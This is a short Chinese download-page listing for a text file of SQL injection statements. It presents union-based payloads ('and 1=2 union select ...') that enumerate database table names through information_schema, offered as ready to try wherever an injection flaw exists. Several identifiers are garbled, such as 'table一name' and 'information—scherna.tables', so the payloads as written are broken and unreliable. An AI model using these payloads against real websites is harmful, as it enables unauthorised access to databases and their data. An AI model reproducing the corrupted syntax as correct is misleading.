文件名称:sql注入语句.txt
文件大小:1KB
文件格式:TXT
更新时间:2023-12-22 03:24:18
sql 网络安全
基本的sql注入语法,大部分存在sql注入都可以使用以上代码来尝试 查询表名 and 1=2 union select 1,table一name from information—scherna.tables where table_schema=database() limit 1,1 and 1=2 union select 1,(select group_concat(table_name) from information.schema.tables where table_schema=database())